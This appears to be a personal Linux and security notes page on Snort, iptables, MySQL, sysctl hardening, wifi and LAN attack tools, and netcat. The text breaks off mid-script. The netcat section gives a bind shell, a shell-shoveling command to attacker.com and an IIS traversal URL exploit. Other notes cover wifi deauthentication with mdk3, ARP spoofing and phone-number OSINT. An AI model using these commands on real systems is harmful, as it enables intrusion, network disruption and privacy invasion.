βεη's Development Notes
βεη, remember to start incorporating images into this page. Sticking to text only is no longer prudent.
Also include hyperlinks and click examples into clipboard.
I need to find a better type of TOC local linking.
Review to see if I have any duplicated sections...
Note that this material is currently under development and is not yet complete or fully formatted.
This information is exclusively for my own use and those whom I authorize. Any violation will be punished to the full extent of my imagination.
See the Usage Policy Page (https://thepurplefiles.com/usagepolicy.html) for terms of use before proceeding to access or use any of the material on this website ("thepurplefiles.com").
Remember to format and include the raw material commented out at the end of this page.
Locations:
Hiawatha httpd with CGI. See https://www.hiawatha-webserver.org/howto and https://www.hiawatha-webserver.org/howto/monitor
┌──(parth㉿parth)-[~/Spells/Hiawatha/hiawatha-11.3]
└─$ sudo hiawatha -h
Usage: hiawatha [options]
Options: -c <path>: path to where the configrationfiles are located.
         -d: don't fork to the background.
         -h: show this information and exit.
         -k: check configuration and exit.
         -m: show enabled modules and exit.
         -v: show version and copyright and exit.
This is a local httpd
┌──(parth㉿parth)-[~]
└─$ lighttpd --help
lighttpd: invalid option -- '-'
lighttpd/1.4.69 (ssl) - a light and fast webserver
usage:
  -f <name>  filename of the config-file
  -m <name>  module directory (default: /usr/lib/lighttpd)
  -i <secs>  graceful shutdown after <secs> of inactivity
  -1         process single (one) request on stdin socket, then exit
  -p         print the parsed config-file in internal form, and exit
  -t         test config-file syntax, then exit
  -tt        test config-file syntax, load and init modules, then exit
  -D         don't go to background (default: go to background)
  -v         show version
  -V         show compile-time features
  -h         show this help
NAME
    sngrep - SIP Messages flow viewer
DESCRIPTION
    sngrep is a terminal tool that groups SIP (Session Initiation Protocol) Messages by Call-Id, and displays them in arrow flows similar to the used in SIP RFCs. The aim of this tool is to make easier the process of learning or debugging SIP. It recognizes UDP, TCP and partially TLS SIP packets and understands bpf filter logic in the same way ngrep (8) and tcpdump (1) does.

RAWSHARK(1)
NAME
    rawshark - Dump and analyze raw pcap data

┌──(parth㉿Parth)-[/proc]
$ capinfos --help
Capinfos (Wireshark) 3.6.5 (Git v3.6.5 packaged as 3.6.5-1)
Print various information (infos) about capture files.
See https://www.wireshark.org for more information.

OSINT Phone Numbers
Use a VPN when running these.
tool: phoneinfoga https://github.com/sundowndev/phoneinfoga/releases
$ phoneinfoga scan -n 5023306338
So far, this is not very useful.
Great looking website analyser https://freesmscode.com.cutestat.com/
Get Free Phone Codes https://www.freesmscodes.com/
Consider this... https://www.textverified.com/
Great OSINT site https://inteltechniques.com/
This one worked great! Not all the intel is correct. https://thatsthem.com/

mdk3 is a wifi attack tool. Looks useful for disruption. The d parameter will kick someone off. Actually it kicks everyone off and keeps kicking them off so they keep trying to reauthenticate while you are sniffing that wifi.
$ sudo mdk3 --help
https://wiki.wireshark.org/Tools
$ dumpcap --help
Dumpcap (Wireshark) 3.6.5 (Git v3.6.5 packaged as 3.6.5-1)
Capture network packets and dump them into a pcapng or pcap file.
See https://www.wireshark.org for more information.
$ text2pcap --help
Text2pcap (Wireshark) 3.6.5 (Git v3.6.5 packaged as 3.6.5-1)
Generate a capture file from an ASCII hexdump of packets.
See https://www.wireshark.org for more information.
┌──(parth㉿parth)-[/usr]
└─$ pskracker --help
PSKracker 0.2.1 WiFi Security Auditing Toolkit
Copyright (c) 2017-2019, soxrok2212 <soxrok2212@gmail.com>
Usage: pskracker <arguments>
Required Arguments:
  -t, --target : Target model number
Optional Arguments:
  -b, --bssid  : BSSID of target
  -W, --wps    : Output possible WPS pin(s) only
  -G, --guest  : Output possible guest WPA key(s) only
  -s, --serial : Serial number
  -f, --force  : Force full output
  -h, --help   : Display help/usage
Example: pskracker -t (target model) -b (bssid) -s (serial number)
NAME
    macof - flood a switched LAN with random MAC addresses
SYNOPSIS
    macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
DESCRIPTION
    macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek <ian.vitek@infosec.se>.
NAME
    arpspoof - intercept packets on a switched LAN
SYNOPSIS
    arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
DESCRIPTION
    arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. Kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter(8)) must be turned on ahead of time.
After an update I often find pipewire-pulse reinstalled. This package kills all sound on my system. Run this command to remove it.
┌──(parth㉿Parth)-[~]
└─$ sudo apt purge --autoremove pipewire-pulse
The ANSI code for my preferred date/time format is:
%m.%d.%Y %H:%M:%S
Load a CSV file into a table
mysql> LOAD DATA INFILE '/tmp/filename.csv' replace INTO TABLE [table name] FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (field1,field2,field3);
Dump just the inventory database
$ sudo mysqldump -u root -p --databases inventory > inventoryDB.10.05.2020-13:21:49.sql
Export the entire Inventory table to CSV format
/* Note that you can export only into the '/var/lib/mysql-files/' directory */
select id, ifnull(ip,'None'), ifnull(mac,'Unknown'), ifnull(name,'Unknown'),
       ifnull(location,'unknown'), ifnull(ports,'unknown'), ifnull(type,'Unknown'),
       ifnull(sn,''), ifnull(os,''), ifnull(firmware,''), ifnull(dante,''),
       ifnull(ssid,''), ifnull(channel,''), ifnull(frequency,''), ifnull(band,''),
       ifnull(channelwidth,''), ifnull(strength,''), ifnull(encryption,''),
       ifnull(notes,''), ifnull(ethernet,'')
  from inventory
  into outfile '/var/lib/mysql-files/inventory.csv.export.date.time.csv'
  fields enclosed by '"' terminated by ';' escaped by '"'
  lines terminated by '\r\n';
Load a CSV file into a table. Save the sheet as csv, remove the title line, and save
mysql> LOAD DATA LOCAL INFILE '~/CCCC/Tech/database/CCCC.Network.Inventory.csv' replace INTO TABLE inventory FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (ip, mac, name, location, type, sn, os, firmware, ssid, channel, frequency, band, encryption, notes);
Insert new record
INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...);
MariaDB [inventory]> insert into inventory (mac, ip, name, os) values ('00:1b:9e:37:4a:15', '192.168.3.127', 'OfficeVolunteer', 'Windows Vista Home Premium - Service Pack 2. 32-bit OS');
GROUP BY
select mac, count(*) as Total from inventory group by mac order by Total desc;
Insert new record if a field value does not exist
INSERT INTO inventory (mac) SELECT 'e8:9f:80:43:55:04' WHERE NOT EXISTS (Select mac From inventory WHERE mac ='e8:9f:80:43:55:04') LIMIT 1;
Finding counts in mysql
select mac, COUNT(*) from inventory group by mac;
select ip, COUNT(*) from inventory group by ip;
select ip, COUNT(*) from inventory group by ip HAVING COUNT(*) >= 1 order by count(*);
-- group by the column, not the aggregate; "group by count(*)" is not valid
select ip, COUNT(*) from inventory group by ip having COUNT(*) >= 1;
List available APs
$ nmcli dev wifi list
Compress an Entire Directory or a Single File
$ tar -czvf name-of-archive.tar.gz /path/to/directory-or-file
List all local socket connections
$ sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
Back up your installed apps
$ sudo apt-clone clone --with-dpkg-repack ~/my.system/apt-clone-packages
The find command
$ find /home/username/ -name "*.err"
This file has become too large for a traditional TOC search mechanism. I need to consider some other approach.
---[Command Info]--- (top)
Ben, flesh this out...
$ whatis cmd
$ whereis cmd
$ apropos cmd
$ cmd -h or --help
$ man cmd
---[wordlists]--- (top)
---[snort]--- (top)
Getting started with Snort’s Packet Logger mode
Start logging packets
$ sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf
Read stored packets
# snort -d -v -r /home/parth/Hacking/logfilename.log.xxxxxxx
# snort -dev -r /var/log/snort/snort.log.1037840339| more
Setting up a service file to auto launch snort
sudo nano /lib/systemd/system/snort.service
Add this material and save the file (f3 and then f2)
[Unit]
Description=Snort NIDS Daemon
After=syslog.target network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/snort -q -c /etc/snort/snort.conf -i eth0

[Install]
WantedBy=multi-user.target

sudo systemctl enable snort
Synchronizing state of snort.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable snort
Created symlink /etc/systemd/system/multi-user.target.wants/snort.service → /lib/systemd/system/snort.service.
sudo systemctl start snort
sudo systemctl status snort
snort.service - Snort NIDS Daemon
   Loaded: loaded (/lib/systemd/system/snort.service; enabled; vendor preset: disabled)
   Active: active (running) since Mon 2019-12-09 13:07:15 EST; 6s ago
 Main PID: 7109 (snort)
    Tasks: 2 (limit: 9343)
   Memory: 143.8M
   CGroup: /system.slice/snort.service
           7109 /usr/sbin/snort -q -c /etc/snort/snort.conf -i wlan0
Dec 09 13:07:15 wintermute systemd[1]: Started Snort NIDS Daemon.
ps aux | grep -i snort
root      6674  0.0  0.0   8360   4120 pts/2  S+   12:59   0:00 sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf
root      6675  0.2  1.9 569148 154976 pts/2  Sl+  12:59   0:01 snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf
root      7109  3.7  1.8 567716 151232 ?      Ssl  13:07   0:01 /usr/sbin/snort -q -c /etc/snort/snort.conf -i wlan0
Getting started with Snort’s Network Intrusion Detection System (NIDS) mode
With the following command Snort reads the rules specified in /etc/snort/snort.conf, so that instead of inspecting all of the traffic it focuses on the specific incidents referred to in snort.conf through customizable rules.
The parameter “-A console” instructs snort to alert in the terminal.
# snort -d -l snortlog -h 10.0.0.0/24 -A console -c snort.conf
IDS mode with logging in pcap format and echo to console
# sudo snort -c /etc/snort/snort.conf -i wlan0 -l /var/log/snort/ -b -A console -P 65535
In this default configuration, Snort sends logs in tcpdump format to the /var/log/snort directory. Line 471 enables what Snort calls unified logging. This type of logging logs both the complete packet and the alerts. For now, let's uncomment this type of output (unified2) and comment out line 481.
Ref. https://linuxhint.com/snort-ubuntu-tutorial/
Edit /etc/snort/snort.conf to change 'any' to 192.168.1.0/24
sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf
Where:
  -d  tells snort to show data
  -l  determines the logs directory
  -h  specifies the network to monitor
  -A  instructs snort to print alerts in the console
  -c  specifies the Snort configuration file
Since we instructed Snort to save logs, we can read them by running:
# snort -r
Also see: https://linuxhint.com/configure-snort-ids-create-rules/ https://www.securityarchitecture.com/learning/intrusion-detection-systems-learning-with-snort/configuring-snort-on-linux/
Ensure Syslog, Rsyslogd or Syslog-NG is configured to log LOG_AUTH and LOG_ALERT.
This shows snort alerts
$ cat -v auth.log | grep -i "snort"
# sudo snort -d -s -v -u snort -g snort -c /etc/snort/snort.conf -h 192.168.2.0/24
Where:
  -A  instructs snort to print alerts in the console
  -D  daemon mode
  -d  tells snort to show data
  -b  pcap format
  -c  specifies the Snort configuration file
  -h  specifies the network to monitor
  -l  determines the logs directory
  -P  snaplength
  -s  log to syslog
  -v  verbose
$ sudo snort -P0 -s -v -d -l /var/log/snort/ -h 192.168.2.0/24 -c /etc/snort/snort.conf
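Once alerts are going to syslog with -s, a few pipeline functions turn auth.log into a quick summary: hits per signature, hits per source, distinct targets touched by one source (a scan indicator), and the Priority 1 alerts. This is an added example, not part of the original notes; the log lines are constructed and the line shape assumed is Snort 2's syslog format.

```shell
#!/bin/sh
# Added example, not from the original notes: summarize Snort alerts that "-s"
# sent to syslog.  Assumed line shape (Snort 2 syslog output):
#   <date> <host> snort[<pid>]: [gid:sid:rev] <msg> [Classification: ..] [Priority: N] {PROTO} src:sport -> dst:dport

# Constructed sample of an auth.log with one unrelated sshd line mixed in.
snort_sample_log() {
    cat <<'EOF'
Sep  1 12:00:01 wintermute snort[7109]: [1:1000001:1] LOCAL ssh scan [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.10.10.10:44321 -> 192.168.2.1:22
Sep  1 12:00:03 wintermute sshd[812]: Accepted publickey for parth from 192.168.2.15 port 51000 ssh2
Sep  1 12:00:04 wintermute snort[7109]: [1:1000001:1] LOCAL ssh scan [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.10.10.10:44322 -> 192.168.2.2:22
Sep  1 12:00:07 wintermute snort[7109]: [1:1000001:1] LOCAL ssh scan [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.10.10.10:44323 -> 192.168.2.15:22
Sep  1 12:00:09 wintermute snort[7109]: [1:2100498:7] GPL ATTACK_RESPONSE id check returned root [Classification: Potentially Bad Traffic] [Priority: 1] {TCP} 10.10.10.11:80 -> 192.168.2.15:51240
EOF
}

# Keep only Snort alert lines from whatever log arrives on stdin.
snort_alert_lines() {
    grep 'snort\[[0-9]*]: \[[0-9]*:[0-9]*:[0-9]*]'
}

# "count gid:sid:rev" per signature, busiest first.
snort_sid_counts() {
    snort_alert_lines |
    sed 's/^.*snort\[[0-9]*]: \[\([0-9:]*\)].*$/\1/' |
    sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# "count source-ip" per offending host, busiest first.
snort_src_counts() {
    snort_alert_lines |
    sed 's/^.*} \([0-9.]*\):[0-9]* -> .*$/\1/' |
    sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Number of distinct destination hosts one source ($1) touched; many targets
# from a single source is the classic scan signature.
snort_distinct_targets() {
    snort_alert_lines |
    grep "} $1:[0-9]* -> " |
    sed 's/^.* -> \([0-9.]*\):[0-9]*$/\1/' |
    sort -u | wc -l | tr -d ' '
}

# Only the most severe alerts, the ones worth paging on.
snort_priority1() {
    snort_alert_lines | grep '\[Priority: 1\]'
}

# On a real box: sudo cat /var/log/auth.log | snort_sid_counts
snort_sample_log | snort_sid_counts
snort_sample_log | snort_src_counts
snort_sample_log | snort_priority1
```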
Dumping the pcap log
$ sudo tcpdump -s0 -xX -r /var/log/snort/snort.log.1567367664
$ ls -tor /var/log/snort/
---[swatch]--- (top)
swatchdog -c ~/.swatchdogrc -t /var/log/syslog
or
swatchdog -c ~/.swatchdogrc -t /var/log/syslog --daemon
$ swatchdog .swatchdogrc
---[Apache2]--- (top)
Install with
sudo apt install apache2
Following are some basic commands to manage Apache processes.
To restart the Apache web server, type the following command:
sudo systemctl restart apache2
To stop the web server, type the following command:
sudo systemctl stop apache2
To start the web server, type the following command:
sudo systemctl start apache2
To reload the configuration file, type the following command:
sudo systemctl reload apache2
The Apache service will start after boot; to disable this, run the command below:
sudo systemctl disable apache2
To enable the Apache service to start after boot, run:
sudo systemctl enable apache2
Important Apache files and directories:
Enabling CGI:
ben@benb:/etc/apache2/sites-available$ sudo a2enmod cgi
Your MPM seems to be threaded. Selecting cgid instead of cgi.
Enabling module cgid.
To activate the new configuration, you need to run:
  systemctl restart apache2
ben@benb:/etc/apache2/sites-available$ systemctl restart apache2
sudo ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/
Create a test.cgi file that is a Perl script with a .cgi suffix. Then set its mode.
ben@benb:/usr/lib/cgi-bin$ cat test.cgi
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "Hello world";
sudo chmod 755 /usr/lib/cgi-bin/test.cgi
After running these you can open the index.html file at http://127.0.0.1:80
$ sudo service apache2 start
$ service apache2 status
## Start command ##
$ sudo systemctl start apache2.service
## Stop command ##
$ sudo systemctl stop apache2.service
## Restart command ##
$ sudo systemctl restart apache2.service
---[iptables]--- (top)
In Linux generally, "iptables" isn't a service - it's a command to manipulate the netfilter kernel firewall. You can "disable" (or stop) the firewall by setting the default policies on all standard chains to "ACCEPT", and flushing the rules.
$ sudo iptables -P INPUT ACCEPT
$ sudo iptables -P OUTPUT ACCEPT
$ sudo iptables -P FORWARD ACCEPT
$ sudo iptables -F
$ service iptables stop
Starting and stopping the service
$ sudo service iptables start
$ sudo service iptables stop
UFW (/usr/sbin/ufw) is a front-end for iptables, to make managing a Netfilter firewall easier, hence the name “Uncomplicated Firewall”.
Is iptables running
$ systemctl status iptables
See what rules are already configured.
$ sudo iptables -L
As of 083019
$ sudo iptables -L
[sudo] password for parth:
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
Detailed list of iptables
$ sudo iptables -L -v
Delete the rules of iptables
$ sudo iptables -F
Blocking a specific IP
$ sudo iptables -A INPUT -s 10.10.10.10 -j DROP
Blocking an IP range
$ sudo iptables -A INPUT -s 10.10.10.0/24 -j DROP
$ sudo iptables -A INPUT -s 10.10.10.0/255.255.255.0 -j DROP
Blocking a single port:
$ sudo iptables -A INPUT -p tcp --dport ssh -s 10.10.10.10 -j DROP
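The block rules above are easy to mistype (an extra octet, a mask with a stray slash), and iptables' error message does not always make that obvious. As an added example that is not part of the original notes, here is a small wrapper that validates the address or CIDR first and only appends the DROP rule when it is not already present; block_source and valid_ipv4_cidr are names chosen for this example.

```shell
#!/bin/sh
# Added example, not from the original notes: validate a source address before
# passing it to iptables and append the DROP rule only when it is not already
# present.  Typos such as 10.10.10.10.0/24 or 10.10.10.0/255.255.255/.0 are
# rejected here rather than by iptables.

# Returns 0 when $1 is a dotted-quad IPv4 address with an optional /0-32 prefix.
valid_ipv4_cidr() {
    addr=${1%%/*}
    case $1 in
        */*) prefix=${1#*/} ;;
        *)   prefix=32 ;;
    esac
    # only digits and dots in the address part; no leading, trailing or double dots
    case $addr in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $addr
    IFS=$oldifs
    [ $# -eq 4 ] || return 1            # exactly four octets
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    case $prefix in
        ''|*[!0-9]*) return 1 ;;        # prefix must be a plain number
    esac
    [ "$prefix" -le 32 ]
}

# Drop all inbound traffic from $1 (address or CIDR) without duplicating rules.
block_source() {
    if ! valid_ipv4_cidr "$1"; then
        echo "block_source: refusing malformed source '$1'" >&2
        return 2
    fi
    # -C succeeds only if an identical rule already exists, so -A runs at most once
    iptables -C INPUT -s "$1" -j DROP 2>/dev/null ||
        iptables -A INPUT -s "$1" -j DROP
}

# Usage (needs root): block_source 10.10.10.0/24
```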
Allowing all outbound traffic
# iptables -A OUTPUT -j ACCEPT
Stopping iptables
$ sudo systemctl stop iptables $ sudo systemctl disable iptables
Resources https://www.linuxbabe.com/security/ufw-firewall-debian-ubuntu-linux-mint-server
---[HTML Character Entities]--- (top)
A character entity has three parts: an ampersand (&), an entity name or a # followed by an entity number, and finally a semicolon (;). Note that entities are case sensitive.
The Most Common Character Entities:
https://dev.w3.org/html5/html-author/charref
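The main defensive use of these entities is output encoding: untrusted text is converted to the entity form before it is placed in a page, so a stray < or " cannot start a tag or attribute. The sed chain below is an added example, not from the original notes; html_escape is a name chosen here. It also shows why the ampersand must be handled first.

```shell
#!/bin/sh
# Added example, not from the original notes: encode untrusted text with HTML
# character entities (the &name; / &#number; forms described above) so it is
# safe to place in HTML text or a quoted attribute value.

# The ampersand is replaced first.  If it were done later, the '&' of the
# entities produced by the earlier substitutions would itself be re-escaped.
html_escape() {
    printf '%s' "$1" | sed \
        -e 's/&/\&amp;/g' \
        -e 's/</\&lt;/g' \
        -e 's/>/\&gt;/g' \
        -e 's/"/\&quot;/g' \
        -e "s/'/\&#39;/g"
}

# Same substitutions in the wrong order, kept only to show the failure mode:
# "<" becomes "&lt;" and then the "&" pass turns that into "&amp;lt;".
html_escape_wrong_order() {
    printf '%s' "$1" | sed \
        -e 's/</\&lt;/g' \
        -e 's/&/\&amp;/g'
}

# Escape every line on stdin, e.g. before interpolating a log file into a report.
html_escape_stream() {
    while IFS= read -r line || [ -n "$line" ]; do
        html_escape "$line"
        printf '\n'
    done
}

html_escape '<script>alert("x")</script> & more'
printf '\n'
```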
---[netcat nc]--- (top)
Examples
Setup a listener
> nc -v -v -l -d -e cmd.exe -p 5000
Get the shell
> nc -v -v 127.0.0.1 5000
[Using netcat to pull banners]
You can use nc to pull banners.
nc 127.0.0.1 80
HEAD / HTTP/1.0
The results will include, "Server: Microsoft IIS/4.0" for example.
[Using netcat to get an HTTPd host's non-routable IP address]
Ref: http://www.nextgenss.com/advisories/iisip.txt
nc 127.0.0.1 80
PROPFIND / HTTP/1.1
Host:
Content-Length: 0
[netcat shell shoveling]
Ref: pentest@securityfocus.com post Oct. 2, 2001 by Junginger, Jeremy.
nc attacker.com 80 | cmd.exe | nc attacker.com 25
If the attacker is listening on TCP 80 and 25, and TCP 80 is allowed inbound and 25 is allowed outbound to/from the target through the firewall, then the above command 'shovels' a remote command shell from the target to attacker.com.
[Using netcat to HTTPTunnel]
Ref: http://www.codetools.com/internet/httpunneling.asp
HTTPTunneling means making an arbitrary TCP connection through a proxy.
nc 127.0.0.1 80
CONNECT <dest_IP>:<dest:port> HTTP/1.1<CR><LF>
<header_line>:<CR><LF>
<header_line>:<CR><LF>
...
<CR><LF><CR><LF>
If the proxy's response code is 200 then after the empty line the proxy begins functioning as a tunnel between you and the target.
If the proxy requires authorization, simply supply it by including the Proxy-Authorization header.
[Using netcat to check for proxies]
You can also check for a frontend proxy with nc.
nc 127.0.0.1 80
TRACE / HTTP/1.0
The result will show this host to be the proxy, and in the Trace section at the end you will get the HOST: IP number of the actual web host!
[Using netcat to send URL hacks]
Another great use for netcat: you can (manually or scripted) send HTTP requests and receive the pages on the console. This is great for sending URL exploits. You can create your own headers, pass query strings, attempt malcode injection, and exploit HTTP methods and headers.
nc 127.0.0.1 80 (enter once)
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
---[Find the version of Linux]--- (top)
$ uname -a
Linux wintermute 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
And more specifically which version of Mint
$ cat /etc/linuxmint/info
RELEASE=19.2
CODENAME=tina
EDITION="Cinnamon"
DESCRIPTION="Linux Mint 19.2 Tina"
DESKTOP=Gnome
TOOLKIT=GTK
NEW_FEATURES_URL=https://www.linuxmint.com/rel_tina_cinnamon_whatsnew.php
RELEASE_NOTES_URL=https://www.linuxmint.com/rel_tina_cinnamon.php
USER_GUIDE_URL=https://www.linuxmint.com/documentation.php
GRUB_TITLE=Linux Mint 19.2 Cinnamon
---[mysqld]--- (top)
This is how you run a .sql batch file from the command line
┌──(parth㉿parth)-[~/Hacking/Password.Cracking/passwords]
$ sudo mariadb cracking < runinsert.sql > results.tab -u root
Each line in the .sql file must be a valid sql statement of any type. This is MUCH more efficient than pasting blocks of lines into a shell.
These are the steps to install mysql per https://www.kali.org/tools/mysql-defaults/
sudo apt install default-libmysqld-dev
sudo apt install default-mysql-client
sudo apt install default-mysql-client-core
sudo apt install default-mysql-server
sudo apt install default-mysql-server-core
sudo apt install mysql-common
sudo apt autoremove
$ sudo mysql_secure_installation
# sudo /etc/init.d/mysql start
# sudo /etc/init.d/mysql stop
# sudo /etc/init.d/mysql restart
# sudo systemctl status mysql
# sudo systemctl disable mysql
# service mysql start
# service mysql status
# mysql -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 49
Server version: 10.3.18-MariaDB-1 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)
---[aescrypt]--- (top)
Suppose you have a file called "picture.jpg" that you would like to encrypt using the password "apples". You would enter the following command:
$ aescrypt -e -p apples picture.jpg
You could backup files and encrypt them with a command like this:
$ tar -cvf - /home | aescrypt -e -p apples - > backup_files.tar.aes
Rather than include the password on the command line, omit the -p parameter:
$ aescrypt -d picture.jpg.aes
What if you just want to have it displayed on the screen and not stored in a plaintext file? Use this syntax:
$ aescrypt -d -o - passwords.txt.aes
Generate a private key:
$ aescrypt_keygen -p apples secret.key
The key file is nothing more than a UTF-16LE encoded file containing the password. One can use Notepad on Windows to create a key file. Just save the file using the "Unicode" format when saving.
Now when you wish to encrypt a file, you call AES Crypt like this:
$ tar -cvf - /home | aescrypt -e -k secret.key - > backup_files.tar.aes
---[Report system specs]--- (top)
$ sudo lshw
Or
$ inxi -Fxz
$ sudo lshw -short
---[sysctl]--- (top)
DESCRIPTION sysctl is used to modify kernel parameters at runtime. The parameters available are those listed under /proc/sys/. Procfs is required for sysctl support in Linux. You can use sysctl to both read and write sysctl data.
Kernel parameter values changed using the 'sysctl -w' method are volatile, i.e. lost on server reboot. The sysctl utility's configuration file, /etc/sysctl.conf, should be used to permanently store non-default kernel parameter values. The file is parsed on server boot and the values within are used to configure the kernel.
The syntax required to configure kernel parameters using the /etc/sysctl.conf file follows the component.parameter=value notation.
Edit /etc/sysctl.conf or /etc/sysctl.d/99-custom.conf and update it as follows. The file is documented with comments. However, I recommend reading the official Linux kernel sysctl tuning help file (see below): (https://www.cyberciti.biz/faq/linux-kernel-etcsysctl-conf-security-hardening/)
# The following is suitable for dedicated web server, mail, ftp server etc.
# ---------------------------------------
# BOOLEAN Values:
# a) 0 (zero) - disabled / no / false
# b) Non zero - enabled / yes / true
# --------------------------------------
# Controls IP packet forwarding
net.ipv4.ip_forward = 0
# Do not accept source routing
net.ipv4.conf.default.accept_source_route = 0
# Controls the System Request debugging functionality of the kernel
kernel.sysrq = 0
# Controls whether core dumps will append the PID to the core filename
# Useful for debugging multi-threaded applications
kernel.core_uses_pid = 1
# Controls the use of TCP syncookies
# Turn on SYN-flood protections
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_synack_retries = 5
########## IPv4 networking start ##############
# Send redirects, if router, but this is just server
# So no routing allowed
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Accept packets with SRR option? No
net.ipv4.conf.all.accept_source_route = 0
# Accept Redirects? No, this is not router
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
# Log packets with impossible addresses to kernel log? yes
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
# Ignore all ICMP ECHO and TIMESTAMP requests sent to it via broadcast/multicast
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Prevent against the common 'syn flood attack'
net.ipv4.tcp_syncookies = 1
# Enable source validation by reversed path, as specified in RFC1812
net.ipv4.conf.all.rp_filter = 1
# Controls source route verification
net.ipv4.conf.default.rp_filter = 1
########## IPv6 networking start ##############
# Number of Router Solicitations to send until assuming no routers are present.
# This is host and not router
net.ipv6.conf.default.router_solicitations = 0
# Accept Router Preference in RA?
net.ipv6.conf.default.accept_ra_rtr_pref = 0
# Learn Prefix Information in Router Advertisement
net.ipv6.conf.default.accept_ra_pinfo = 0
# Setting controls whether the system will accept Hop Limit settings from a router advertisement
net.ipv6.conf.default.accept_ra_defrtr = 0
# router advertisements can cause the system to assign a global unicast address to an interface
net.ipv6.conf.default.autoconf = 0
# how many neighbor solicitations to send out per address?
net.ipv6.conf.default.dad_transmits = 0
# How many global unicast IPv6 addresses can be assigned to each interface?
net.ipv6.conf.default.max_addresses = 1
########## IPv6 networking ends ##############
# Enable ExecShield protection
# Set value to 1 or 2 (recommended)
#kernel.exec-shield = 2
#kernel.randomize_va_space=2
# TCP and memory optimization
# increase TCP max buffer size setable using setsockopt()
#net.ipv4.tcp_rmem = 4096 87380 8388608
#net.ipv4.tcp_wmem = 4096 87380 8388608
# increase Linux auto tuning TCP buffer limits
#net.core.rmem_max = 8388608
#net.core.wmem_max = 8388608
#net.core.netdev_max_backlog = 5000
#net.ipv4.tcp_window_scaling = 1
# increase system file descriptor limit
fs.file-max = 65535
# Allow for more PIDs
kernel.pid_max = 65536
# Increase system IP port limits
net.ipv4.ip_local_port_range = 2000 65000
# RFC 1337 fix
net.ipv4.tcp_rfc1337=1
$ sysctl --help
Usage: sysctl [options] [variable[=value] ...]
Reject PING requests
$ sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
List all vars and their values
$ sudo sysctl -a | more
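Because sysctl -w changes are volatile and /etc/sysctl.conf is only read at boot, it is worth checking that the running kernel still matches the hardening file. The drift checker below is an added example, not from the original notes; sysctl_drift is a name chosen here, it compares a sysctl.conf-style file against saved "sysctl -a" output, and the demo feeds it constructed files so it runs without root.

```shell
#!/bin/sh
# Added example, not from the original notes: check a sysctl.conf-style
# hardening file against what the running kernel reports.  On a real host:
#   sudo sysctl -a > /tmp/running.txt
#   sysctl_drift /etc/sysctl.conf /tmp/running.txt
# The demo below feeds it constructed files instead.

# Prints one line per expectation that is not met:
#   DRIFT key: running=X want=Y   the value differs
#   MISSING key (want Y)          the key is absent from the running kernel
sysctl_drift() {
    awk -F'=' '
        /^[ \t]*#/ { next }                      # comment line
        /^[ \t]*$/ { next }                      # blank line
        {
            key = $1; val = $2
            gsub(/^[ \t]+|[ \t]+$/, "", key)
            gsub(/^[ \t]+|[ \t]+$/, "", val)
            gsub(/[ \t]+/, " ", val)             # sysctl -a separates multi-value entries with tabs
        }
        NR == FNR { want[key] = val; order[++n] = key; next }   # first file: expectations
        { have[key] = val }                                     # second file: running kernel
        END {
            for (i = 1; i <= n; i++) {
                k = order[i]
                if (!(k in have))
                    printf "MISSING %s (want %s)\n", k, want[k]
                else if (have[k] != want[k])
                    printf "DRIFT %s: running=%s want=%s\n", k, have[k], want[k]
            }
        }' "$1" "$2"
}

# Constructed demo: a subset of the hardening file above versus a fake "sysctl -a".
sysctl_drift_demo() {
    d=$(mktemp -d) || return 1
    cat > "$d/want.conf" <<'EOF'
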